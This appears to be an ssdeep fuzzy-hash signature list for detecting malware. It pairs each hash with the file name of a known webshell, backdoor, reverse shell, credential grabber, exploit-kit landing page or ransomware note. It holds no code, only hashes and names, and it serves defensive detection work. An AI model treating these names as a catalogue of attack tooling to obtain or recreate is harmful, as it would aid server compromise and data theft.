+48:9CHdVj0RmlkepzyLPVx47DHtk1Q+uRoR+qFawbcnhcTiBDz55eefGk+qRrKLMbg:sX5kbLdu+XR+qFawMhc+reeek1rKLMbg,"cat.jar"
+48:9c4+Z9YwAy8vAbZvMPeKotV+7qY1JH+EBHbqEQ8wv6Cdh+SwD:y4NwZ8vUXKoX+7BXeEBbq9bd0SwD,"20160202-141858-VrAuMmjuZ1YAAA7qdpUAAAAI-file-zDdgPD.1454386738_1"
+48:91EXEdrcsL3fA6qafTQcJFJk3NEab0ealyL:91EjgPPqaf1FK32HyL,"Credentials.ps1"
+48:8rd9ZBb8xFkR46kKoenbN1sSdxILjCC8v2go4ctG:8UFa46kK7nMS/48v2go4cM,"mod_finder.php"
+48:8Q5CVgPIKmonRvn2BWGfh3FIulCSE4wEEj:8Q4khFC3FvCKU,"loggers.py"
+48:8Kh796a/X6CFGFVDof7iKn/OJmhPp/S5SL:8KdLZCSL,"cmd.aspx.txt"
+48:8duJxLzd+rQdj/ERlnT1esn+nlp1Bks/p/h6aSZTZ:8mLx+Ew8snClp3d/p/hKZ,"20160203-141004-VrF9nGjuZ1YAAG-6r6MAAAAf-file-7V81oY.1454472604_1"
+48:82SM896agX67KPF6kof7tKnghMNhzb59j:82Syrz99j,"cmd2.aspx"
+48:7Sq67TFr02cXG+ENx/EHBS0iKWRKRG5GOGdfp95rqveOjZrfxx4B0phi2XeI:7Sl7xrcXtyNFPKRG5GOGdh6Nm4Tl,"ka.php"
+48:7SgWeFPMgiaTloAGN+BgfzwmKGJq7Z39MoVvevmP1epW5t09yKm3VqZ2tSwtpHd:7zBF0giulXieCVy39JVvevuUpWsgF3Vb,"Phyton Shell.py"
+48:7oDEeeu0VY7xHJ/aomhdpw1wqVrwg59Lw+h5dDLKHw1wrgbK43VEQ9ROJ:w3eu0VUbaom7K75u+hDDLKqbK43VDQ,"shellcode.py"
+48:7iTQGbr2qKUhYTl2LyF7Smlmame+yUsE21:GTQGbr2EeT4LiHfvUM,"magic.php.4"
+48:7Edp3247LwmERUB+5jAhvJSPO1STSOOUiSAdjxDHcnW1iwx/iDDxDquQSm6KojId:7cYZUjhvJSPUOwJvxkp06Fskg+in,"database.js"
+48:7CA2wzrqLOnYn6U2tXyF1WWhFOytAibvBScB1G8byXy72PwgJkSA1KL8g7ic:7CazmOn06/fWNyiFScB1Xj7QkSoKwm,"FireListener.ps1"
+48:7acQk5sYQZXQnWCWgf5kU9/N9hCg0pAyzXgVSizVoYOog9/Ze/gGVcQFgVvPhgC+:2cQkltrBR/yK4RQm0KDW4nN+Kz1iP,"Hantu-shell.php"
+48:75aU+Pb2o2XLpSYYMsmoHmoBkioDmGxkSjsjjrVR9g2puAdd7bKIsIrFmj:NaU+qoQ86oHmoOJDmGeSjWjxMOPTrcj,"KAdot Universal Shell v0.1.6.txt.001"
+48:742Hilmi8b7opdvrfJQUfmBudvI/PQwYQJW8EXFsVQRf0ojJmr8SYnF9GFn:74Vl2ApFrRQUfquFIXQBQYyQRf0GmoiF,"home.php.013"
+48:6WvtAOPJTqEYRySRB27yk27DTqdKNjBlpqEkk11LJv27B2272+CE6aDGzj0qlzJp:jFxxYgS7i7ivyajBlpvrBJviEi25XYw,"xm1rpc.php.2098322466"
+48:/6qF25cdhbDBKIZiP2TOgYwg90SCy6QtpIm659qD4wrWsR4poWSG4cjREnS:/6q1fBzZcdPx90OFIm74AyrSJmES,"spammer.php"
+48:6mLycNB1WyHVCkf/JLM4lnLvlodYjg9FhZAP4Vv3VheBsDCI3caxOaCRzapoNdx9:/B1Wy1b/lTlDlykYb3nqRcGb,"grabber.php"
+48:6lEfYNKIVO1va1saF8TBznB2B1B5s7lvLZlvjNrJ5QUhdHzA:7fYgI81v2NF8F1sL5s5vfvp95QUrc,"ListMaker.php"
+48:6jeuRJysHjMcmwu5vl3g7MJWpO+MJjtJsPYPdJJ3JXpGHDf7g:6jTRPjgjvR7P3t/p,"Queue.py"
+48:6jeuRJysHjMcdIyjch/KsualybJ/cgPW5bzNLJwbFKnSGwguxJL:6jTRPjvHcFKsusybNcHNLzSG3aZ,"FuzzerDictionary.py"
+48:6j78CUEv5mzNr+ct5FzfJT5spbHolkfEyueuEW5uKxZw3J0lDp7L0+LTLChCqp:6hql25sVtEWgKXw3JSNL04PCsqp,"admin.txt"
+48:6J1//JVGjLHDLHso4bb5Z4w+5GCOnVvWPqii/lTrhTD:w1/xVofkfCOVePqii/P,"Download-Execute-PS.ps1"
+48:6dXQWdq9Fulx8Ezzzzzzza6d7TpoZgGE9lWiHmh5t:EgW0GlK6dKZg4iH2j,"菊花聊天室.asp"
+48:6AZcgG4jDGzoDaYkXw3WvY66zLiGkzoG8PoMyQckXgQnHzxM1YrtO2eunY8XWlIc:vcgJGMDaT1vYkzYP1ySlnTqYrg2eUY8U,"mal-shell3.php"
+48:61CTg/CUXPXMX9TU9gHdW9906XQ/0rw0rvogsMso:Ca9coJ08UHpV,"wp-cron.php"
+48:5Z777L0LMEnLMs+1boHontsoqcSYqfwuEQQQAuuvn7pkkxiU:5NnLyMELMs+18HohABflEQQQAdf7pBx1,"php版iisspy.php"
+48:55b/i40ZsnwdOKJ3mCU2SVdXiyjBy3/mbTnwac4:55z0ZwfxdjWubTnwaX,"log"
+48:4zoC39y5ODJS1CCASWqGHTIP7+A3jmyWrp3UEb:sL393DJSZuqGlAzoN5,"legacyreferrer.py"
+48:4v6+AFakqNBycWQrHca+flUp4Pioz2ObnhlqY1TVhngbMD:YAFVCBycWQrHumpspVwyn4o,"VirusShare_0f11303eedf4be94f0db09d7ca8dfa72"
+48:4rjJH84h+n3DOHMi7zxN4bcVWEIO8tkaRxeRXryEOFnfsMcXQ+BnqQvFQ61O2nTJ:4RHTM6sqBVFva7eJG+XQ+Bnxo+T/Dl,"backdoor.py"
+48:4oqi6mLQ1s5RCM/GI8Q3qCYwl/rp2s0f3VH827U:PPj5/D8QLYK/4182o,"k8cmd.jsp"
+48:4M6arGOdB48rXTpCLr2Y5MbeO3+D/SDiF1wVdW9bgXYL2X:UpOdB4+Tp8r2YiCDb2VMEz,"2016-03-02-kiwitemplates.com-jquery-migrate.min.js.txt"
+48:4ib/pdw3ZrK+1G3S1mkroKQ2TPbNyC9Wao6:Z/pdwh1GF4JZ,"2016-07-22-pseudoDarkleech-Neutrino-EK-landing-page.txt"
+48:4ib/pdNy3C4nCSc3S1mkroKQ2TPbNyC9Wao6:Z/pdYznCScF4JZ,"2016-07-26-Afraidgate-Neutrino-EK-lading-page-first-run.txt"
+48:4ib/pdb3y0OHegJ3S1mkroKQ2TPbNyC9Wao6:Z/pdb6HegJF4JZ,"2016-07-25-EITest-Neutrino-EK-landing-page.txt"
+48:4ib/pdB3Q0qt1rY3S1mkroKQ2TPbNyC9Wao6:Z/pdBA0arYF4JZ,"2016-07-27-Afraidgate-Neutrino-EK-lading-page-second-run.txt"
+48:4ib/pdb3P0SJjVA3S1mkroKQ2TPbNyC9Wao6:Z/pdb/cF4JZ,"2016-07-22-Afraidgate-Neutrino-EK-landing-page-first-run.txt"
+48:4ib/pdb3HWyX2UXqjZ53S1mkroKQ2TPbNyC9Wao6:Z/pdb3MFZ5F4JZ,"2016-07-26-pseudoDarkleech-Neutrino-EK-landing-page-second-run.txt"
+48:4ib/pdb3HWWk4p/V3gbF3S1mkroKQ2TPbNyC9Wao6:Z/pdb39p93uF4JZ,"2016-07-26-Afraidgate-Neutrino-EK-lading-page-second-run.txt"
+48:4ib/pdb3HWwbYV293S1mkroKQ2TPbNyC9Wao6:Z/pdb3FYV29F4JZ,"2016-07-26-pseudoDarkleech-Neutrino-EK-landing-page-first-run.txt"
+48:4ib/pdB3a0qJ1rY3S1mkroKQ2TPbNyC9Wao6:Z/pdBK00rYF4JZ,"2016-07-27-Afraidgate-Neutrino-EK-lading-page-first-run.txt"
+48:4ib/pd/43VvdIPjSA3S1mkroKQ2TPbNyC9Wao6:Z/pdwlvdkSAF4JZ,"2016-07-25-pseudoDarkleech-Neutrino-EK-landing-page-after-sinyimusic.com.txt"
+48:4ib/pd/43VhyqIPwHA3S1mkroKQ2TPbNyC9Wao6:Z/pdwl8qJHAF4JZ,"2016-07-25-pseudoDarkleech-Neutrino-EK-landing-page-after-depressivedisorder.xyz.txt"
+48:4ib/pd43rWID0003S1mkroKQ2TPbNyC9Wao6:Z/pd4SIDJ0F4JZ,"2016-07-22-Afraidgate-Neutrino-EK-landing-page-second-run.txt"
+48:49YMjuERA1reQ1ywEIG6b3NUgBchUgYf/f06ZZs622:whaEieQIwEiWgehUgYf/f0V6V,"jpghead_cmd.aspx"
+48:45swY6OpZaSX9YSx65MnDVyGbM5anrMj7cxttYolR0VJdV49PYyk8iZ:P64aSDcqDVyGbM0nYj7Ot/lRsJdY88G,"magic.php.1.001"
+48:45fwbH01B/6wmcdpL6Dx6HPujd288XRK3V3Q7xRb6I:iWqMYzwx6OduCAuI,"magic.php.2"
+48:43tJ2ZZUEyg14NTZRy8Hp5pZpb4QK4aef4iKLd:KJ2ZZxeZZHp5pZpb4/4nf4iSd,"123.jsp"
+48:42OLLPmaq3V1WounvvscVb49p/2UVVM+9WUx:GLPq3mouXscVb4vHVVGUx,"magic.php.1"
+48:42iTQGbr2qKUhYTl2LyF7Smlmame+yUsE21:aTQGbr2EeT4LiHfvUM,"magic.php"
+48:3WGL/59HeRA7WG9tOU4MDoWowYbnTKv0CaA+RXapGz9qnMm2G8w0FBPOu0JI:39Z78M1owuuPFCKoz9qnM7S0FxOTI,"sadow.txt"
+48:3V2HqfkwujMCGcSIWvSCZ8nEzMPs1gOXofF+HdX2gJK/pvBHGB1IvY7oVcSgYKpO:3V2Kswuw7vgEzMPs1BXf2gw/pQXIvYkr,"themes.txt"
+48:3o0D5aUqa0Lu8Fohh3KA3V0L77cjMXWempOiYQg6LxfGwotpB8teOf8u:3fox9slb3mL3AMXWeUYQgaEvkf7,"Invoke-Bitsbackdoor.ps1"
+48:3NwM+cF8+vptyuyHHMj/wzOO4Dvhk5CeRP1DMW1gY/eW0aKT+nwe2RV6V8:3NwcFzv7yBM7wzOOgy7RGgWW0af92n,"shell.cfm"
+48:3N7p0yNsT9swI0Fwo82kpB4qFrHjcAXixgTil+ahHkydBrMJYjBD7oRXzQFGgtnM:3b0es9ZIJvxrHLiFsgZObtb,"sh.txt.1"
+48:3msDKJd/jH0a0BMo2nq9JzEpJxS58qJdutP4+23fOGNvmDqSD07u0:rad3GkpbSlvVPpv5Lf,"mailzor111.php"
+48:3lOwU33KC5Kvhf9O3cF/4b/ny/HPpJy34TmSW3:3lOwo9u2H2HPpqnx3,"tcpserver.py"
+48:3duJxLzd+rQdj/ERlnT1esn+nlp1Bks/p/h6aSo:3mLx+Ew8snClp3d/p/hP,"20160202-071807-Vq-Lj2juZ1YAAEYwyiAAAAAi-file-Sca7gG.1454361487_1"
+48:2t1OfQ97XT0WCKf2XFpPwBMowupPC5EEgFW9vkWMssH2+FQ0Ftafwld:2XOfW7XgWC62VpPwBMoPZC5EEgFW9cSi,"rsync.py"
+48:2s/AHZMSRQvDZ0mc7A3BrLu551MuOO0A0sWAFH+98f6Jv:r/AHZMSRQvDZNwzTBLY9F,"raid.txt.001"
+48:2s/AHZMSRQv7Z0mc7A3BrLu551MuOO0A0sWAFH+98f6Jv:r/AHZMSRQv7ZNwzTBLY9F,"content.gif.1"
+48:2HvjowqlDs+SH//ZSrXS27ltvZPnM+cniynAanGybnqvQaj:2HvjowqdgYXSirvVnM+cnvnAanGQqvn,"x.php.8"
+48:2HvjMs+SH//ZSrXS27ltvZPnM+cniynAanLFbnqvQaj:2HvjMgYXSirvVnM+cnvnAanLdqvn,"x.php.6"
+48:2HvjMs+SH//ZSrXS27ltvZPnM+cniynAanLbnqvQarT:2HvjMgYXSirvVnM+cnvnAanHqvz,"2015.php.5"
+48:2HvjMs+SH//ZSrXS27ltvZPnM+cniynAanLbnqvQaj:2HvjMgYXSirvVnM+cnvnAanHqvn,"2015.php.4"
+48:2HvjMs+SH//ZSrXS27ltvZPnM+cniynAanGybnqvQaj:2HvjMgYXSirvVnM+cnvnAanGQqvn,"x.php.7"
+48:2HvjMs+SH//ZSrXS27ltvZPnM+cniynAanGbnqvQaj:2HvjMgYXSirvVnM+cnvnAanMqvn,"x.php.3"
+48:2HvjMs+SH//ZSrXS27ltvZPnM+cniynAanCbnqvQaj:2HvjMgYXSirvVnM+cnvnAanAqvn,"boiola.php"
+48:2HvjMs+SH//ZSrXS27ltvZPnM+cniynAanbbnqvQaj:2HvjMgYXSirvVnM+cnvnAan3qvn,"x.php.10"
+48:2HvjMs+SH//ZSrXS27ltvZPnM+cniynAan3bnqvQaj:2HvjMgYXSirvVnM+cnvnAanLqvn,"x.php.12"
+48:2HvjMs+SH//ZSrXS27ltvZPnM+cniynAan0bnqvQaj:2HvjMgYXSirvVnM+cnvnAanGqvn,"x.php.11"
+48:2hNQsQYmyFlOOo7BrZUvYpbT2xDhRs/VzZE5TcHVTcRPB7VM0/jBgZ:2pFlapZ5bEDuz0RPBL/lgZ,"UpServlet.class"
+48:21r+jLjTqLvLS7LJzvvwrKMSLZaSxWKCzyeOlyqpn:21r+XKDEJzwrK3N3xWjy/yqpn,"Remove-Update.ps1"
+48:1mM4z5k5ORH1HG5HfY2AJa40VoRvRu7wNWdOpyK29oSUPl:l6e5ORVHG5HfY2Gh8o0zH9v0,"fileupload_by_Mark_Woan.aspx.txt"
+48:1gW3l+FPMgiaTCV5j+X/5aBsY4z3j4Q+o+LQ+o+6+k2F1ROK26akELq:+hF0giuSG/5qzq4Qp2Qpfx2ROLp3Lq,"d00r_py3.py"
+48:1ehuQ/QqeChfgYM2Riw2G8Sw5bHG43ayIQNnSn:57qbVS2RBgh3aSS,"ReadMe.txt"
+48:1a6arGOdB48rXTpNKr2yKHeO3NvTHjAcKwTzYW9bgiwB:1jpOdB4+TpAr2PSwTDER,"jquery.prettyPhoto.js.txt"
+48:11J2eMxUp/zN0J2eMx7f/zIyJReMx8f/zve3HWo7lO8+v3:132Y026qRge3P7c8+v3,"2016-07-08-pseudoDarkleech-Neutrino-EK-landing-page-after-toronot-annex.com.txt"
+48:11J2eMxUp/zN0J2eMx7f/zIyJReMx8f/zRV3jrT6pM0b:132Y026qR4/T6pM0b,"2016-07-07-EITest-Neutrino-EK-landing-page-after-musicmix.co.txt"
+48:11J2eMxUp/zN0J2eMx7f/zIyJReMx8f/zRgS3Q+iWhJ5:132Y026qRHSg+iWhJ5,"2016-07-08-EITest-Neutrino-EK-landing-page.txt"
+48:11J2eMxUp/zN0J2eMx7f/zIyJReMx8f/zQ73x01PM0g5:132Y026qRzS1Plu,"2016-07-08-pseudoDarkleech-Neutrino-EK-landing-page-after-eielectronics.com.txt"
+48:11J2eMxUp/zN0J2eMx7f/zIyJReMx8f/zl3C29X4Fynm5:132Y026qR0S29X4Qnm5,"2016-07-07-Neutrino-EK-landing-page.txt"
+48:11J2eMxUp/zN0J2eMx7f/zIyJReMx8f/zI/3Fjz9l:132Y026qR//V/b,"2016-07-07-pseudoDarkleech-Neutrino-EK-landing-page-after-gennaroespositomilano.it.txt"
+48:11J2eMxUp/zN0J2eMx7f/zIyJReMx8f/zI/3F//:132Y026qR//V//,"2016-07-07-pseudoDarkleech-Neutrino-EK-landing-page-after-drupatis.com.txt"
+48:11J2eMxUp/zN0J2eMx7f/zIyJReMx8f/zed9a3xDIAc+KmbehIAc+q:132Y026qRBahXcVmbeRc9,"2016-07-08-other-Neutrino-EK-landing-page.txt"
+48:11J2eMxUp/zN0J2eMx7f/zIyJReMx8f/z83HWL1akQ/Qhu5JK:132Y026qRh3e1JQ/Qheo,"2016-07-07-pseudoDarkleech-Neutrino-EK-landing-page-after-toronto-annex.com.txt"
+48:11J2eMxUp/zN0J2eMx7f/zIyJReMx8f/z83HWL1ak9bQSa5JK:132Y026qRh3e1JFQ1o,"2016-07-07-pseudoDarkleech-Neutrino-EK-landing-page-after-lawrenceparkah.com.txt"
+48:0y+x8d/JnRjMb8EBcBDGAOAYL5OmQzotUgywatu+BAhP8hmR1hGjZJN6messSP:0ys8TRT3sVtjYMWhAsZn6mesF,"processes.php"
+48:/0vWASvwphJaq3iM46D90YLq8Eok0PbuD9GfKqeZwoChM0FbdmQF2twZ672E344J:/oJSYphJzyMmN2ClZnsHpFRM7Hg1J7e3,"ntlmpool.py"
+48:0NwMCcFM9MktyYyHHKjlDcP4MdMALJ9KOzKQyQ22RVJOwdTNN22RVJE:0NwSFMO8yLKdc4Md1ATd2ywdTNk2I,"killnc.php"
+48:0NwMCcFM9MktyYyHHKjkbhmLJ9KOzKQyQ22RVJOwdTNN22RVJE:0NwSFMO8yLKAbgATd2ywdTNk2I,"killnc.php"
+48:0NwMCcF8aGktyYyHHKjUZJZJZ7hZ9dlZ3+HZhZUMNNSx1:0NwSFo8yLKQXXb3yxNNS7,"settings.php"
+48:0NwM2cF8nbgktyuyHHMj0hmLJ9KOzKQyQ22RVJOz0RTkwxNq979AOaVx22RVJE:0NwsFMbg8yBMAgATd2y0kyq9RAT22I,"host.php"
+48:0NwM2cF8dkFB5HktyuyHHMjuIRE4GMlg5:0NwsF5r8yBM5E4GMlS,"ipcheck.php"
+48:08P2nhFK32SIR4GlhU7XnwXvGGanBlfTyoKBvPqBuBBNYxhuoy8ZwiStP:086OpItvz/GGWxmoKPakBKZy8ZZSF,"2016-03-29-EITest-flash-file-from-folesd.tk-for-redirect-to-Angler-EK.swf"
+48:00zS/ccRGUlTfH5gRd7pdo9Jzj3g+RJopGlvb1WqoTQjnro8AM1ZBLR5hWS5E3kk:Y7lLKqHYqHQ,"2016-05-31-CryptXXX-decrypt-instructions.html"
+48:00zS/ccRGUlTf2rU1ZcslqFrFgmUa9xWb+w+JDvLVqkSWHXhE+dVDDn3XvzFLmYJ:Y7lL8yz8ezI,"2016-06-01-CryptXXX-decrypt-instructions.html"
+3:zxxA2017zA5HFYkJC+tDOvJxMG4MQnRx7AV9GA2017zA5HNMLSn22017zArHZ9:9xA2MnIbCp4GAz7APGA2MnIq2MnWZ9,"inback3.jsp"
+3:zxxA2017zA5HFYkJC+tDOvJxMG4MQnRx7AV9GA2017zA5HNMLSn22017zArHZ/5u:9xA2MnIbCp4GAz7APGA2MnIq2MnWZwdn,"IXRbE.jsp"
+3:zXFYB3J6ILQRKvn:x63JjER0n,"__init__.py"
+3:/ZWyWFFmAWOAnyB:hdWF1WOA6,"tie01.asp"
+3:ZuOpLqWwAuidUQZ0wIKu:ZushwAuidUQZru,"schtasks.ps1"
+3:ZuF4JF5s13tP1HQ5AjFilitMC6lVKciSoL/J:ZuFsCD6XiCC6yciSoDJ,"schtasks1.ps1"
+3:ZRX22017zA5HFYkJC+tDOvJxMG4MQnRx7AVHMOm2017zA5HNMLSn22017zArHZj:ZU2MnIbCp4GAz7Aed2MnIq2MnWZj,"zx.jsp"
+3:ZRNMfg1GvaxCJ/RVu6GdeYnnBtEib6GdSHA8/JaQYiMvFu6GdSHA8/JaQYhNwyUO:vNeuGvACJ/6ncimX/5pKTX/52NlIts,"Readme.md"
+3:ZoYBOMC+KCOV:WYBOMVu,"dang.txt.1"
+3:ZoqQXYBNG3vBRnEBj9cmOnDf88nRidSWQ91idSWDTc7NJ94sdGeL:WqSnEBBNOA8UdSWQSdSWWGw,"utf85.php"
+3:ZopTc3vBGgqEeeZwpMEUEYwpHBeIC3oQ6pWQBGfCxD:W4wg/eeZwTpAIsgHGfCp,"general.php"
+3:ZoJNMUg4wRJ+7MCv//q0JHwRJ+7J+i+7MuYn:WJpaivX/aCdOYn,"enviador.txt"
+3:ZoH5bn:WZbn,"testeurl.txt?"
+3:ZMLvrK/WMRXRGEvyJM/8vvxW9FbhEBO4jPUClBQAZRblt0S4TkvjLAsb:urUWQyC/Qw9F2Y4zb/ZRbz4Nsb,"AUTHORS"
+3:ZjtTEMbBHeT1Y0j2Mt4AY:5tIMlqjk,"rWHqXwSC1HMx"
+3:ZjLfABVV+e9eCLE8fab:5jMme9/Nab,"raw2.5317"
+3:ZjEeJu:5EeJu,"res.txt"
+3:ZjEeJb:5EeJb,"res.txt.1"
+3:Zjdl:5dl,"x"
+3:ZHJZTJHUfyQ:hXQ,"bug (1).php"
+3:ZBjMeIiR/x7D/eIRPQiulA5EFEZNpaPrk1SgGls8D+:ZBwW7yoPQi55E+ZKKg1q,"bypass-iisuser-p.asp"
+3:yTJHUfCbn:ynbn,"bug.php"
+3:yionv//thPl3PhhOBxCP27xFTnmOXsfzW2/g6yBMJOLpEZMIOvtXsup:6v/lhP1FP21h3SxyB6OLpEGIK9sup,"xsspng.png"
+3:yionv//thPl3PhhkV9h/rywOzWaYBkB1WcyFZqxpEf76UXTi+Dpn0+OUloPd0jp:6v/lhP1ihmPWTyaYxsnp2Pd0jp,"phppng.png"
+3:YDN8aNaOQv:YvQv,"HTTP CODE Header Backdoor Command Shell - server.php"
+3:YbRYrhlCgqZOWLP/F82SgSWV:Yt2lCgqZHq2BV,"密码.txt"
+3:XttktkkrIVwmPUB3x6SQjogfuow2k67BCWRC:dy9mPUB3x6STowVYtQ,"rs.c"
+3:xGfTcxA4ycC7qG6Fbn:xeQxA4ycC2h,"errors.php"
+3:WX8fFYhF9hSFmAWgevabv:WsCmWgeC,"theme2.txt.1"
+3:WWVCoBoJT+ZKWYt0yHwyH2ovvvBXQcFbBRgd5crylATED2Za0pHQvn:WWVCoBoddfJHwybvvvRQc5BRE5cqAI6u,"bypass01.php"
+3:WQW/iEH8wzdAUd2HaiQPDMV1FTTGmwDSTQ2gG5baXIYYmHpDy6BBQzERueATga4o:WQYiEcwZAUdgZSDMVfTTGmwR2g61mHt4,"WSB-idc.php"
+3:wQAIFzXU1a:HUg,"400_blacklist.txt"
+3:WkEvNVicrL34KUVeYKtef3CfKQv2SfflLrKewHkiRtXDn:bcrzJUVeY53CfLrX5Kzn,"readme.md"
+3:WGQLFYtcAMfdFr77qTQSwNQEZlQ5ne3JqcnDz6UKBJj+svsyBGG+kuVKQCODUf6:WGQLFnAMfTqo7ZlRz6UaJj9vp/7zODUS,"php-ftp.php"
+3:WEY8zMLyvhJxTRRSk7NXGrQHWDSOWxyNdUX06iHiBwQvn:WERhJxtL7NXGrQUWoTQvn,"bypass-safedog-2016-08-29.php"
+3:WeiYYn:We7Y,"cleartext1_php.tpl"
+3:WDsG00ovMLP23GOLWwv:WCrKP2PLv,"file-includer.php"
+3:WARBRvXRLzDEmRLdEmRKvPuRSBLHVERSBvLNiSBLKaVTQSBKvLDuRSXR:HhftzDftFOPu0hVE0Hx9b8vLK0h,"403_blacklist.txt"
+3:vTtovZBtS761NS4TfBHLaeABcNT2xyBedTBDcw4Y6WCE4m8YNeVn:vTkZNSqxh6xYeHmYeEaaeVn,"wptwipsy.php"
+3:VsOiDitVAqGTZtA1KGCpcBx6B3AEOWFBYFnN1KLooDnHMLn:yOiDitVAzro6FdOW7YFNAFsLn,"readme.md"
+3:vmLuTHW:uw2,"1.bat"
+3:vFWWMNHUCyi14:TMVAie,"example.xml"
+3:UyBLqUKvBSUDFKYN9V7JXpRfXLUCCBuBR0A9GC4fKn:UsqUKprRrJ5Rfbnei0Ak7in,"bd1cf4c3fcdb7ea5625dbe192517d492_php.txt"
+3:UyBLqUKvBdh1cEzR7cNzdJoJeO0De6OIgJGe7Vwvmg28zvJLJEJv8BaRkJDAWcND:UsqUKpBcE9AzdJoJR9oywPJCviaRADu,"9e448d931a7c3f6e6cd994ca3e4850f4_php.txt"
+3:UWY/Q9LRmcpZBMkAqRAdu6/GYlWX/CPLKLf7EAQrFJALRcDLLKnCHgwMbQSnLohs:UHQ9L/pZVAqJmW/C27EAkFJzfAhQWLpz,"2016-05-17-khamsanphukhoa.com.vn-js-jquery-1.7.1.min.js.txt"
+3:UqeVN3tGFQZvGGVK12ta66kEbDwK:ULNtGFQcGVK12ta66xnl,"reverse-bash.sh"
+3:uoEqMMOKvQ:uoET0Q,"teste1.php.1"
+3:udFYSOStEC6HZJBYi5BERAFYvZxBMWW:uHYSOQr6bwgYGx,"setup.cfg"
+3:tPuCDqv7HW2017zA2s4:tWW2Mnhs4,"cmd1.jsp"
+3:TKQWaHMPAEZo:HWaHwy,"__init__.py"
+3:TKQWaHM7PgBHihr4zdlv/FhpLmIvJKMvAdnF/9Kl98tRqGLAsn:HWaHsPECh0zd9FjDJXv4F/El9jGL9,"exim.pl"
+3:TKH/O9FUFTr6NjGHYdMhFYoeJBBUgXncF4QL71gMv3vvoBF:ZUUjGQMhFYxGy0Z3kF,"mass"
+3:TKH/MN0IeAtRATWIJTLPHYEaeHB0wi2xc4zAKPP7qCC8RojFHztd3HMv2Axn:OQ8a0HQiCwVxcEvPTqCC8Rojhztd3HMh,"cgi.sh"
+3:TDZKqA5SgMg+Fgq8BHcVjMMQGYtfbvkdEL/WGP/vQBs/WGP/vn:ZKvMpFgq8BcRGbv8ED13UM13n,".htaccess"
+3:TDZKqA5SgMg+FgDEjMMQGYtfxovxO/WGP/vSv8s/WGP/vn:ZKvMpFgDAGx0G13K13n,".htaccess"
+3:TD+SVE0sGy7MD0jKqA5vhWA/u3d54rjRmlLTh/WWyWo+WABfjRmlLSJp/WRz2xky:v/y7MWKqAx9uTuRmj5Wk7RmkJRWaZn,"bad-htaccess"
+3:tDNGFjvDet9vDetERcYEWNAhxS12Ln:xYNbm9bmERcpKAhxS1+,"common_backdoor.php"
+3:tDFLRHgv9ARMxAdnKCsbscJYQKxM6o29AROCCob:x1RAviRMoKCsbFJYpY2iROCCob,"_input_1_DEM.php5"
+3:tDFKYN9V7JXpRfXLUCCBuBR0A9GC4fKn:xRrJ5Rfbnei0Ak7in,"inject.php"
+3:SUr/hlAGKyI4MGMiyT9cFWARQhI6NbvYj2:SUrpqG7I4sim+sARQhHN7YC,"_version.py"
+3:SpV1CsRsMmMLt7WFJiKC7MdxoyYBR6a6Xozy0RMDEgXVRMJvMoMhI:SpV1BRts6KLdxABR66e04bFqJUBI,"__init__.py"
+3:skSn12/n4EfKCzJYQKEB+OJNV7O5Phn:skBby6JYsB+cVO5Ph,"guo.php"
+3:SFF1fn:SNfn,"phpinfo.php"
+3:sACGXqFgcgdshVvNWvvCJflMS4NNRzyEd7lPSASg5eqAU:sACIcxbNyCRsDzzGAh/AU,"jweevely.md"
+3:rPZdMgWAaGfUNcApr3jdMgWab:bZ2gHaMUvpr3qgdb,"id1.txt.4"
+3:RNcIfnTAQ0ZsIsIZn:xfHNIs0n,"ditto.txt"
+3:RFUaz:oaz,"hi.txt.1"
+3:RF1HwQ:F,"1.php.001"
+3:qVv5Xs6OqPFFSKPAl4FR5EC0AO7BEH/8JE0NS3A5jAVN/MM+sL+KBc4NGb:qF5Xs6OqPbRAlIi0B0S3A5ENl+E+Kq4O,"hello.asp"
+3:pv2AjKvKE8079KMapt31lHFoQw9tH4R65E0+7vzgLWAgMW+KNAWOWAxAdRun:pv28+KE8Y9K1tFlyhH4RqwvYKNAWuATu,"proxy.asp"
+3:PouVpAzLcvKEZRjHjJMzVJu+1i/kK3uB+tvAU3Nq4NGL:hzAzLcSoJMRJVi/D3uodA8q4QL,"c100.txt.2"
+3:pn:pn,"run.bat"
+3:PFoESNt/FPl2XJt/e32B5dllF/llmlllFYPXiJVC4kb5/6afcwkudsfRTsudQ+bH:PgG0mgaviJVC4i5ClOsfV5dHbH,"._reDuh.aspx"
+3:PFoESNt/FPl2XJt/e32B4lHllF/llmlllFYPXiJVC4kb5/6afcwkudsfRTsudQ+z:PgG0mTaviJVC4i5ClOsfV5dHbH,"._reDuh.jsp"
+3:PFoESNt/FPl2X8llglt836uW/fBlllUkPXiJVBQS8QDv0iDal:PgGM4wjGLvviJVFXDv0i+l,"._reDuhClient.jar"
+3:P7rVmFgsx8Azz/5RKAfsvguN9P8Ad55Dtrdho3vxV8hRTEd8x3AD:DkWhq/mAks4jxKxVWE2xU,"不带引号的pHp一句话.php"
+3:OyRrPiy4MHzWXXHFmUY6:OyxieQE6,"p.php"
+3:Oy2eNAjCNXwwFvHEWATR7cNkdaL:Oy3NeCNRmW2Akd6,"zone_hackbar_other.php"
+3:OxNFBQGLdg7mM0MJIx5KOZY3hBJGqKuQ:OxNRBnIIx5KOZ+zQ,"includer.txt"
+3:OqAj333WxaBs12x33CHLQnDgXYWRXjqW1ShUWgVSv:Ob3QaRxCEOWWlWQSv,"x.php"
+3:OJ0S227A9AdrqpoEcFvBqmovD4K6:OJ0KprqpoEcrqmFd,"3802.php"
+3:Oi0ALGNS89CBy9NX46TFxCCJRF0+3xA9Vd2rLMVQWfMaCL:OibV8gwvXD7BJv3xA0LKrI,"w-ob_start02.php"
+3:O9KN0crFvlhzJYVPLP4g2/21cNxSVAX3cQn/Yy9pAURMFNV:O9KN0mtJYVM/JMTQngy9uURMFNV,"w_2016-05-25.php"
+3:O6LyyRCeQXXzciavEXZ9yZj2GkBe/6jE0KXBtRECY:O6fke/iavsypwLjNKXrREf,"pass-waf-2014-10-19.php"
+3:O3lL7pA:O15A,"备注.txt"
+3:O2yaDW0ALGNS8+AlWZeYdM+3xA9Vd2rLMVQWfManWAXRN0EY/C:O2yaKbV8HlWgM3xA0LKrBWA4EY6,"w-ob_start01.php"
+3:nPtZADvFffXRNTW5BdM6n:PtZAT9fXvW5/,"一句话2015-06-10-02.php"
+3:NHg4oCtPAzkMiICtGFC6:p/tPAwj/tSC6,"mygirl-non-sysfunc-command-shell.php"
+3:NHg4+MHAaKREVpqLHVQjN0VX+QFNFTBiFFH+MwcmITBMeHNHe5KVDv6AwC6:pTHABRE0QjN2+QFNTUTH1HZzV56,"simple-cmd.php"
+3:NgDmNMRva1BPJucEon:6me47Zz,"readme.md"
